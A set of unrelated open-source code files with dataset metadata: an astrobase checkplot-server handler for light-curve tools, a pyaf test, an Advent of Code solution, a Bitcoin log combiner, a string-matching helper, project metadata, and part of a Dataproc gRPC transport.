thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
(((wtimes -
cptimes.min()) < filt_hi) &
((wtimes -
cptimes.min()) > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
stimes = wtimes[filterind]
smags = wmags[filterind]
serrs = werrs[filterind]
# see if the lcmagfilters are set
if lctoolkwargs['lcmagfilters']:
wtimes, wmags, werrs = stimes, smags, serrs
filtermasks = [
np.full_like(wtimes, False, dtype=np.bool_)
]
# parse the mag filter strings
filterstr = lctoolkwargs['lcmagfilters']
filters = filterstr.split(',')
filters = [
x.strip()
for x in filters
]
for filt in filters:
try:
thisfilt = filt.split(':')
if len(thisfilt) == 2:
filt_lo = float(thisfilt[0])
filt_hi = float(thisfilt[1])
filtermasks.append(
(wmags < filt_hi) &
(wmags > filt_lo)
)
elif (len(thisfilt) == 3 and
thisfilt[0].strip() == 'not'):
filt_lo = float(thisfilt[1])
filt_hi = float(thisfilt[2])
filtermasks.append(np.logical_not(
((wmags < filt_hi) &
(wmags > filt_lo))
))
else:
continue
except Exception:
continue
# finally, apply the filters if applicable
if len(filtermasks) > 0:
# apply the filters using an OR
filterind = np.column_stack(filtermasks)
filterind = np.any(filterind, axis=1)
stimes = wtimes[filterind]
smags = wmags[filterind]
serrs = werrs[filterind]
# at the end of processing, remove from lctoolkwargs
# since the pfmethod doesn't know about this
del lctoolkwargs['lctimefilters']
del lctoolkwargs['lcmagfilters']
# if the varepoch is set to None, try to get the
# minimum-light epoch using a spline fit
if lctoolargs[-1] is None:
LOGGER.warning(
'automatically getting min epoch '
'for phased LC plot'
)
try:
spfit = lcfit.spline_fit_magseries(
stimes, # times
smags, # mags
serrs, # errs
lctoolargs[6], # period
magsarefluxes=lctoolkwargs['magsarefluxes'],
sigclip=None,
verbose=True
)
# set the epoch correctly now for the plot
lctoolargs[-1] = spfit['fitinfo']['fitepoch']
if len(spfit['fitinfo']['fitepoch']) != 1:
lctoolargs[-1] = (
spfit['fitinfo']['fitepoch'][0]
)
# if the spline fit fails, use the minimum of times
# as epoch as usual
except Exception:
LOGGER.exception(
'spline fit failed, '
'using min(times) as epoch'
)
lctoolargs[-1] = np.min(stimes)
# now run the phased LC function with provided args,
# kwargs
# final times, mags, errs
lctoolargs[3] = stimes
lctoolargs[4] = smags
lctoolargs[5] = serrs
# the sigclip kwarg isn't used here since we did this
# already earlier
del lctoolkwargs['sigclip']
lctoolfunction = CPTOOLMAP[lctool]['func']
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if (lspmethod in tempcpdict and
isinstance(tempcpdict[lspmethod], dict)):
if periodind in tempcpdict[lspmethod]:
tempcpdict[lspmethod][periodind] = (
funcresults
)
else:
tempcpdict[lspmethod].update(
{periodind: funcresults}
)
else:
tempcpdict[lspmethod] = {periodind: funcresults}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
'because readonly = True'
)
#
# assemble the return dict
#
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
retkey = 'phasedlc%s' % periodind
resultdict['result'] = {
'objectid':objectid,
lspmethod:{
retkey:funcresults
}
}
self.write(resultdict)
self.finish()
# if the lctool is var-varfeatures
elif lctool == 'var-varfeatures':
# see if we can return results from a previous iteration of
# this tool
if (not forcereload and
'varinfo' in tempcpdict and
isinstance(tempcpdict['varinfo'], dict) and
'varfeatures' in tempcpdict['varinfo'] and
isinstance(tempcpdict['varinfo']['varfeatures'], dict)):
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
'varinfo': {
'varfeatures': (
tempcpdict['varinfo']['varfeatures']
)
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
lctoolfunction = CPTOOLMAP[lctool]['func']
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if ('varinfo' in tempcpdict and
isinstance(tempcpdict['varinfo'], dict)):
if 'varfeatures' in tempcpdict['varinfo']:
tempcpdict['varinfo']['varfeatures'] = (
funcresults
)
else:
tempcpdict['varinfo'].update(
{'varfeatures': funcresults}
)
else:
tempcpdict['varinfo'] = {'varfeatures':
funcresults}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
'because readonly = True'
)
#
# assemble the return dict
#
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
'varinfo':{
'varfeatures':funcresults
}
}
self.write(resultdict)
self.finish()
# if the lctool is var-prewhiten or var-masksig
elif lctool in ('var-prewhiten','var-masksig'):
key1, key2 = resloc
# see if we can return results from a previous iteration of
# this tool
if (not forcereload and
key1 in tempcpdict and
isinstance(tempcpdict[key1], dict) and
key2 in tempcpdict[key1] and
isinstance(tempcpdict[key1][key2], dict)):
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
key1: {
key2: (
tempcpdict[key1][key2]
)
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
lctoolfunction = CPTOOLMAP[lctool]['func']
# send in a stringio object for the fitplot kwarg
lctoolkwargs['plotfit'] = StrIO()
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# we turn the returned fitplotfile fd into a base64
# encoded string after reading it
fitfd = funcresults['fitplotfile']
fitfd.seek(0)
fitbin = fitfd.read()
fitb64 = base64.b64encode(fitbin)
fitfd.close()
funcresults['fitplotfile'] = fitb64
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if (key1 in tempcpdict and
isinstance(tempcpdict[key1], dict)):
if key2 in tempcpdict[key1]:
tempcpdict[key1][key2] = (
funcresults
)
else:
tempcpdict[key1].update(
{key2: funcresults}
)
else:
tempcpdict[key1] = {key2: funcresults}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
'because readonly = True'
)
#
# assemble the return dict
#
# for this operation, we'll return:
# - fitplotfile
fitreturndict = {'fitplotfile':fitb64}
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
key1:{
key2:fitreturndict
}
}
self.write(resultdict)
self.finish()
# if the lctool is a lcfit method
elif lctool in ('lcfit-fourier',
'lcfit-spline',
'lcfit-legendre',
'lcfit-savgol'):
key1, key2 = resloc
# see if we can return results from a previous iteration of
# this tool
if (not forcereload and
key1 in tempcpdict and
isinstance(tempcpdict[key1], dict) and
key2 in tempcpdict[key1] and
isinstance(tempcpdict[key1][key2], dict)):
LOGGER.warning(
'returning previously unsaved '
'results for lctool %s from %s' %
(lctool, tempfpath)
)
#
# assemble the returndict
#
resultdict['status'] = 'warning'
resultdict['message'] = (
'previous '
'unsaved results from %s' %
lctool
)
# these are the full results
phasedfitlc = tempcpdict[key1][key2]
# we only want a few things from them
fitresults = {
'method':phasedfitlc['lcfit']['fittype'],
'chisq':phasedfitlc['lcfit']['fitchisq'],
'redchisq':phasedfitlc['lcfit']['fitredchisq'],
'period':phasedfitlc['period'],
'epoch':phasedfitlc['epoch'],
'plot':phasedfitlc['plot'],
}
# add fitparams if there are any
if ('finalparams' in phasedfitlc['lcfit']['fitinfo'] and
phasedfitlc['lcfit']['fitinfo']['finalparams']
is not None):
fitresults['fitparams'] = (
phasedfitlc['lcfit']['fitinfo']['finalparams']
)
# this is the final result object
resultdict['result'] = {
'objectid':objectid,
key1: {
key2: (
fitresults
)
}
}
self.write(resultdict)
self.finish()
# otherwise, we need to dispatch the function
else:
lctoolfunction = CPTOOLMAP[lctool]['func']
funcresults = yield self.executor.submit(
lctoolfunction,
*lctoolargs,
**lctoolkwargs
)
# now that we have the fit results, generate a fitplot.
# these args are for the special fitplot mode of
# _pkl_phased_magseries_plot
phasedlcargs = (None,
'lcfit',
-1,
cptimes,
cpmags,
cperrs,
lctoolargs[3], # this is the fit period
'min')
# here, we set a bestperiodhighlight to distinguish this
# plot from the ones existing in the checkplot already
# also add the overplotfit information
phasedlckwargs = {
'xliminsetmode':False,
'magsarefluxes':lctoolkwargs['magsarefluxes'],
'bestperiodhighlight':'#defa75',
'overplotfit':funcresults
}
# dispatch the plot function
phasedlc = yield self.executor.submit(
_pkl_phased_magseries_plot,
*phasedlcargs,
**phasedlckwargs
)
# save these to the tempcpdict
# save the pickle only if readonly is not true
if not self.readonly:
if (key1 in tempcpdict and
isinstance(tempcpdict[key1], dict)):
if key2 in tempcpdict[key1]:
tempcpdict[key1][key2] = (
phasedlc
)
else:
tempcpdict[key1].update(
{key2: phasedlc}
)
else:
tempcpdict[key1] = {key2: phasedlc}
savekwargs = {
'outfile':tempfpath,
'protocol':pickle.HIGHEST_PROTOCOL
}
savedcpf = yield self.executor.submit(
_write_checkplot_picklefile,
tempcpdict,
**savekwargs
)
LOGGER.info(
'saved temp results from '
'%s to checkplot: %s' %
(lctool, savedcpf)
)
else:
LOGGER.warning(
'not saving temp results to checkplot '
'because readonly = True'
)
#
# assemble the return dict
#
fitresults = {
'method':phasedlc['lcfit']['fittype'],
'chisq':phasedlc['lcfit']['fitchisq'],
'redchisq':phasedlc['lcfit']['fitredchisq'],
'period':phasedlc['period'],
'epoch':phasedlc['epoch'],
'plot':phasedlc['plot'],
}
# add fitparams if there are any
if ('finalparams' in funcresults['fitinfo'] and
funcresults['fitinfo']['finalparams'] is not None):
fitresults['fitparams'] = (
funcresults['fitinfo']['finalparams']
)
resultdict['status'] = 'success'
resultdict['message'] = (
'new results for %s' %
lctool
)
resultdict['result'] = {
'objectid':objectid,
key1:{
key2:fitresults
}
}
self.write(resultdict)
self.finish()
# if this is the special lcfit subtract tool
elif lctool == 'lcfit-subtract':
fitmethod, periodind = lctoolargs
# find the fit requested
# subtract it from the cptimes, cpmags, cperrs
# if not readonly, write back to cptimes, cpmags, cperrs
# make a new phasedlc plot for the current periodind using
# these new cptimes, cpmags, cperrs
# return this plot
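# An illustrative sketch of these steps (not implemented; the exact
# location of the stored fit and its 'fitmags' key are assumptions
# about the fit dict layout):
#
# fitdict = tempcpdict[fitmethod]  # previously stored fit results
# fitmags = fitdict['lcfit']['fitinfo']['fitmags']
# residmags = cpmags - fitmags
# ...then rebuild the phased LC for periodind with
# _pkl_phased_magseries_plot(None, fitmethod, periodind,
#                            cptimes, residmags, cperrs,
#                            fitdict['period'], 'min')
# and return it in resultdict like the phasedlc-newplot branch above.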
# if this is the special full reset tool
elif lctool == 'lctool-reset':
if os.path.exists(tempfpath):
os.remove(tempfpath)
LOGGER.warning('reset all LC tool results '
'for %s by removing %s' %
(cpfpath, tempfpath))
resultdict['status'] = 'success'
else:
resultdict['status'] = 'error'
LOGGER.warning('tried to reset LC tool results for %s, '
'but temp checkplot result pickle %s '
'does not exist' %
(cpfpath, tempfpath))
resultdict['message'] = (
'all unsynced results for this object have been purged'
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
self.finish()
# if this is the special load results tool
elif lctool == 'lctool-results':
target = self.get_argument('resultsfor', None)
if target is not None:
target = xhtml_escape(target)
# get rid of invalid targets
if (target not in CPTOOLMAP or
target == 'lctool-reset' or
target == 'lctool-results' or
target == 'phasedlc-newplot' or
target == 'lcfit-subtract'):
LOGGER.error("can't get results for %s" % target)
resultdict['status'] = 'error'
resultdict['message'] = (
"can't get results for %s" % target
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
# if we're good to go, get the target location
targetloc = CPTOOLMAP[target]['resloc']
# first, search the cptempdict for this target
# if found, return it
# second, search the actual cpdict for this target
# if found, return it
# otherwise, we're being asked for everything
# return the whole
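# An illustrative sketch of the lookup described above (not yet
# implemented):
#
# results = None
# for lookupdict in (tempcpdict, cpdict):
#     found = lookupdict
#     for reskey in targetloc:
#         found = found.get(reskey) if isinstance(found, dict) else None
#     if found is not None:
#         results = found
#         break
# resultdict['status'] = 'success' if results is not None else 'error'
# resultdict['result'] = {'objectid': objectid, target: results}
# self.write(resultdict)
# self.finish()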
else:
pass
# otherwise, this is an unrecognized lctool
else:
LOGGER.error('lctool %s does not exist' % lctool)
resultdict['status'] = 'error'
resultdict['message'] = (
'lctool %s does not exist' % lctool
)
resultdict['result'] = {'objectid':cpobjectid}
self.write(resultdict)
raise tornado.web.Finish()
# if the cpfile doesn't exist
else:
LOGGER.error('could not find %s' % self.cpfile)
resultdict = {'status':'error',
'message':"This checkplot doesn't exist.",
'readonly':self.readonly,
'result':None}
self.write(resultdict)
raise tornado.web.Finish()
# if no checkplot was provided to load
else:
resultdict = {'status':'error',
'message':'No checkplot provided to load.',
'readonly':self.readonly,
'result':None}
self.write(resultdict)
raise tornado.web.Finish()
def post(self, cpfile):
'''This handles a POST request.
TODO: implement this.
This will save the results of the previous tool run to the checkplot
file and the JSON filelist.
This is only called when the user explicitly clicks on the 'permanently
update checkplot with results' button. If the server is in readonly
mode, this has no effect.
This will copy everything from the '.pkl-cpserver-temp' file to the
actual checkplot pickle and then remove that file.
'''
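# An illustrative outline of the copy-back described in the docstring
# (not implemented here; _read_checkplot_picklefile is assumed to be
# the reader counterpart of the _write_checkplot_picklefile used in
# get(), and cpfpath would be resolved from the cpfile argument the
# same way get() does it):
#
# if self.readonly:
#     self.write({'status': 'error',
#                 'message': 'server is in readonly mode',
#                 'readonly': True,
#                 'result': None})
#     raise tornado.web.Finish()
# tempfpath = cpfpath + '-cpserver-temp'
# if os.path.exists(tempfpath):
#     tempcpdict = _read_checkplot_picklefile(tempfpath)
#     cpdict = _read_checkplot_picklefile(cpfpath)
#     cpdict.update(tempcpdict)
#     _write_checkplot_picklefile(cpdict, outfile=cpfpath,
#                                 protocol=pickle.HIGHEST_PROTOCOL)
#     os.remove(tempfpath)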
| {
"content_hash": "89a68bad951a2b39257705ded9a12c34",
"timestamp": "",
"source": "github",
"line_count": 1814,
"max_line_length": 80,
"avg_line_length": 40.52370452039691,
"alnum_prop": 0.36069922459529313,
"repo_name": "waqasbhatti/astrobase",
"id": "c1f527412a4fffb4b925eed592c221419e30348b",
"size": "73676",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "astrobase/cpserver/checkplotserver_toolhandlers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3584"
},
{
"name": "Dockerfile",
"bytes": "891"
},
{
"name": "HTML",
"bytes": "61470"
},
{
"name": "JavaScript",
"bytes": "171219"
},
{
"name": "Python",
"bytes": "2748532"
}
],
"symlink_target": ""
} |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "BoxCox", sigma = 0.0, exog_count = 100, ar_order = 12); | {
"content_hash": "0c3493ee37669ed59ace99580a66bc9d",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 163,
"avg_line_length": 37.57142857142857,
"alnum_prop": 0.7034220532319392,
"repo_name": "antoinecarme/pyaf",
"id": "db61d13dbddfe3e3172f9b71a6dd9b7fdef2f07a",
"size": "263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/artificial/transf_BoxCox/trend_Lag1Trend/cycle_12/ar_12/test_artificial_32_BoxCox_Lag1Trend_12_12_100.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "6773299"
},
{
"name": "Procfile",
"bytes": "24"
},
{
"name": "Python",
"bytes": "54209093"
},
{
"name": "R",
"bytes": "807"
},
{
"name": "Shell",
"bytes": "3619"
}
],
"symlink_target": ""
} |
""" Solution to the second puzzle of Day 9 on adventofcode.com
"""
import os
from itertools import permutations
def main():
""" Optimize Santa's route!
"""
basedir = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(basedir, 'input')
cities = {}
with open(file_path, 'r') as input_file:
for line in [ raw_line.strip() for raw_line in input_file ]:
pieces = line.split(' ')
(start, end, dist) = (pieces[0], pieces[2], pieces[4])
if start not in cities:
cities[start] = {}
if end not in cities:
cities[end] = {}
if end not in cities[start]:
cities[start][end] = int(dist)
if start not in cities[end]:
cities[end][start] = int(dist)
best_route = None
best_length = 0
for route in permutations(cities.keys()):
length = 0
for route_pos, start in enumerate(route[:-1]):
length += cities[start][route[route_pos+1]]
if length > best_length:
best_route = route
best_length = length
print "{} = {}".format(' -> '.join(best_route), best_length)
assert best_length == 804
if __name__ == '__main__':
main()
| {
"content_hash": "55fca3e9f8a8fe00ed073ce43ce9b800",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 68,
"avg_line_length": 25.6,
"alnum_prop": 0.53515625,
"repo_name": "JPinSPACE/AdventOfCode",
"id": "9a6561a1664c95e5bc53eff0f26ebd6e8a7eeb71",
"size": "1280",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "day09/02_inefficient_santa/solution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1129"
},
{
"name": "Python",
"bytes": "75738"
}
],
"symlink_target": ""
} |
"""Combine logs from multiple bitcoin nodes as well as the test_framework log.
This streams the combined log output to stdout. Use combine_logs.py > outputfile
to write to an output file."""
import argparse
from collections import defaultdict, namedtuple
import glob
import heapq
import itertools
import os
import re
import sys
# Matches on the date format at the start of the log event
TIMESTAMP_PATTERN = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{6}Z")
LogEvent = namedtuple('LogEvent', ['timestamp', 'source', 'event'])
def main():
"""Main function. Parses args, reads the log files and renders them as text or html."""
parser = argparse.ArgumentParser(usage='%(prog)s [options] <test temporary directory>', description=__doc__)
parser.add_argument('-c', '--color', dest='color', action='store_true', help='outputs the combined log with events colored by source (requires posix terminal colors. Use less -r for viewing)')
parser.add_argument('--html', dest='html', action='store_true', help='outputs the combined log as html. Requires jinja2. pip install jinja2')
args, unknown_args = parser.parse_known_args()
if args.color and os.name != 'posix':
print("Color output requires posix terminal colors.")
sys.exit(1)
if args.html and args.color:
print("Only one out of --color or --html should be specified")
sys.exit(1)
# There should only be one unknown argument - the path of the temporary test directory
if len(unknown_args) != 1:
print("Unexpected arguments: " + str(unknown_args))
sys.exit(1)
log_events = read_logs(unknown_args[0])
print_logs(log_events, color=args.color, html=args.html)
def read_logs(tmp_dir):
"""Reads log files.
Delegates to generator function get_log_events() to provide individual log events
for each of the input log files."""
# Find out what the folder is called that holds the debug.log file
chain = glob.glob("{}/node0/*/debug.log".format(tmp_dir))
if chain:
chain = chain[0] # pick the first one if more than one chain was found (should never happen)
chain = re.search(r'node0/(.+?)/debug\.log$', chain).group(1) # extract the chain name
else:
chain = 'regtest' # fallback to regtest (should only happen when none exists)
files = [("test", "%s/test_framework.log" % tmp_dir)]
for i in itertools.count():
logfile = "{}/node{}/{}/debug.log".format(tmp_dir, i, chain)
if not os.path.isfile(logfile):
break
files.append(("node%d" % i, logfile))
return heapq.merge(*[get_log_events(source, f) for source, f in files])
def get_log_events(source, logfile):
"""Generator function that returns individual log events.
Log events may be split over multiple lines. We use the timestamp
regex match as the marker for a new log event."""
try:
with open(logfile, 'r', encoding='utf-8') as infile:
event = ''
timestamp = ''
for line in infile:
# skip blank lines
if line == '\n':
continue
# if this line has a timestamp, it's the start of a new log event.
time_match = TIMESTAMP_PATTERN.match(line)
if time_match:
if event:
yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
event = line
timestamp = time_match.group()
# if it doesn't have a timestamp, it's a continuation line of the previous log.
else:
event += "\n" + line
# Flush the final event
yield LogEvent(timestamp=timestamp, source=source, event=event.rstrip())
except FileNotFoundError:
print("File %s could not be opened. Continuing without it." % logfile, file=sys.stderr)
def print_logs(log_events, color=False, html=False):
"""Renders the iterator of log events into text or html."""
if not html:
colors = defaultdict(lambda: '')
if color:
colors["test"] = "\033[0;36m" # CYAN
colors["node0"] = "\033[0;34m" # BLUE
colors["node1"] = "\033[0;32m" # GREEN
colors["node2"] = "\033[0;31m" # RED
colors["node3"] = "\033[0;33m" # YELLOW
colors["reset"] = "\033[0m" # Reset font color
for event in log_events:
print("{0} {1: <5} {2} {3}".format(colors[event.source.rstrip()], event.source, event.event, colors["reset"]))
else:
try:
import jinja2
except ImportError:
print("jinja2 not found. Try `pip install jinja2`")
sys.exit(1)
print(jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.dirname(os.path.abspath(__file__))))
.get_template('combined_log_template.html')
.render(title="Combined Logs from testcase", log_events=[event._asdict() for event in log_events]))
if __name__ == '__main__':
main()
| {
"content_hash": "2b260e00d3b6872f107530456c438fd6",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 196,
"avg_line_length": 41.81147540983606,
"alnum_prop": 0.6112526955498921,
"repo_name": "biblepay/biblepay",
"id": "caa8c9c5bcc026b822461813883e3f8d680cf840",
"size": "5124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/functional/combine_logs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "82631"
},
{
"name": "C",
"bytes": "1676673"
},
{
"name": "C++",
"bytes": "9008941"
},
{
"name": "CMake",
"bytes": "14553"
},
{
"name": "CSS",
"bytes": "211795"
},
{
"name": "Dockerfile",
"bytes": "655"
},
{
"name": "GDB",
"bytes": "444"
},
{
"name": "HTML",
"bytes": "21860"
},
{
"name": "Java",
"bytes": "30291"
},
{
"name": "M4",
"bytes": "199753"
},
{
"name": "Makefile",
"bytes": "130183"
},
{
"name": "Objective-C++",
"bytes": "6210"
},
{
"name": "PowerShell",
"bytes": "3455"
},
{
"name": "Python",
"bytes": "1428152"
},
{
"name": "QMake",
"bytes": "874"
},
{
"name": "Ruby",
"bytes": "3540"
},
{
"name": "Sage",
"bytes": "30188"
},
{
"name": "Shell",
"bytes": "93826"
},
{
"name": "TypeScript",
"bytes": "7705936"
}
],
"symlink_target": ""
} |
import jellyfish
def extract_closest_match(search_key, target_list, score_cutoff=0):
"""Return str value from target list with highest score using Jaro
for String distance.
search_key (str): A string used to search for closest match.
target_list (list): A list of strings for comparison.
score_cutoff (float): A score cutoff (betwen 0 and 1) to be met.
"""
highest_score = score_cutoff
highest_value_key = None
for target_key in target_list:
score = jellyfish.jaro_similarity(search_key, target_key)
if score >= highest_score:
highest_score = score
highest_value_key = target_key
return highest_value_key
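# Example usage (illustrative only; the candidate strings below are made up):
if __name__ == "__main__":
    candidates = ["station_id", "station_name", "state_id"]
    # returns the candidate with the highest Jaro similarity to the
    # search key ("station_name" here) that clears the cutoff
    print(extract_closest_match("station_nm", candidates, score_cutoff=0.8))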
| {
"content_hash": "e9c52683815830891e4a49e04c16c4f5",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 70,
"avg_line_length": 33,
"alnum_prop": 0.6695526695526696,
"repo_name": "GoogleCloudPlatform/professional-services-data-validator",
"id": "9d5ae2b7d7683f8905a4216468a02525f67ecfe2",
"size": "1269",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "data_validation/jellyfish_distance.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HCL",
"bytes": "2694"
},
{
"name": "Python",
"bytes": "396721"
},
{
"name": "Shell",
"bytes": "9068"
}
],
"symlink_target": ""
} |
"""Project metadata
Information describing the project.
"""
# The package name, which is also the "UNIX name" for the project.
package = 'lupin'
project = "Project Lupin"
project_no_spaces = project.replace(' ', '')
version = '0.1'
description = 'A module for tracking eyeball movements'
authors = ['Krishna Bagadia', 'Abinash Meher']
authors_string = ', '.join(authors)
emails = ['krishna.bagadia2@gmail.com', 'abinashdakshana999@gmail.com']
license = 'MIT'
copyright = '2015 ' + authors_string
url = 'http://github.com/krishna95/lupin'
| {
"content_hash": "b73d427f5c1d7762376d120d80b17000",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 71,
"avg_line_length": 31.764705882352942,
"alnum_prop": 0.7166666666666667,
"repo_name": "krishna95/lupin",
"id": "bde45ed4cc8672b84e8ec9c2da329143626387e5",
"size": "564",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lupin/metadata.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19629"
}
],
"symlink_target": ""
} |
import google.api_core.grpc_helpers
import google.api_core.operations_v1
from google.cloud.dataproc_v1.proto import clusters_pb2_grpc
class ClusterControllerGrpcTransport(object):
"""gRPC transport class providing stubs for
google.cloud.dataproc.v1 ClusterController API.
The transport provides access to the raw gRPC stubs,
which can be used to take advantage of advanced
features of gRPC.
"""
# The scopes needed to make gRPC calls to all of the methods defined
# in this service.
_OAUTH_SCOPES = ('https://www.googleapis.com/auth/cloud-platform', )
def __init__(self,
channel=None,
credentials=None,
address='dataproc.googleapis.com:443'):
"""Instantiate the transport class.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
address (str): The address where the service is hosted.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments are mutually '
'exclusive.', )
# Create the channel.
if channel is None:
channel = self.create_channel(
address=address,
credentials=credentials,
)
self._channel = channel
# gRPC uses objects called "stubs" that are bound to the
# channel and provide a basic method for each RPC.
self._stubs = {
'cluster_controller_stub':
clusters_pb2_grpc.ClusterControllerStub(channel),
}
# Because this API includes a method that returns a
# long-running operation (proto: google.longrunning.Operation),
# instantiate an LRO client.
self._operations_client = google.api_core.operations_v1.OperationsClient(
channel)
@classmethod
def create_channel(cls,
address='dataproc.googleapis.com:443',
credentials=None):
"""Create and return a gRPC channel object.
Args:
address (str): The host for the channel to use.
credentials (~.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
Returns:
grpc.Channel: A gRPC channel object.
"""
return google.api_core.grpc_helpers.create_channel(
address,
credentials=credentials,
scopes=cls._OAUTH_SCOPES,
)
@property
def channel(self):
"""The gRPC channel used by the transport.
Returns:
grpc.Channel: A gRPC channel object.
"""
return self._channel
@property
def create_cluster(self):
"""Return the gRPC stub for create_cluster.
Creates a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].CreateCluster
@property
def update_cluster(self):
"""Return the gRPC stub for update_cluster.
Updates a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].UpdateCluster
@property
def delete_cluster(self):
"""Return the gRPC stub for delete_cluster.
Deletes a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].DeleteCluster
@property
def get_cluster(self):
"""Return the gRPC stub for get_cluster.
Gets the resource representation for a cluster in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].GetCluster
@property
def list_clusters(self):
"""Return the gRPC stub for list_clusters.
Lists all regions/{region}/clusters in a project.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].ListClusters
@property
def diagnose_cluster(self):
"""Return the gRPC stub for diagnose_cluster.
Gets cluster diagnostic information. After the operation completes, the
Operation.response field contains ``DiagnoseClusterOutputLocation``.
Returns:
Callable: A callable which accepts the appropriate
deserialized request object and returns a
deserialized response object.
"""
return self._stubs['cluster_controller_stub'].DiagnoseCluster
| {
"content_hash": "f4307f4960a905a19858d07647ba2001",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 81,
"avg_line_length": 35.39080459770115,
"alnum_prop": 0.6146476128613186,
"repo_name": "jonparrott/gcloud-python",
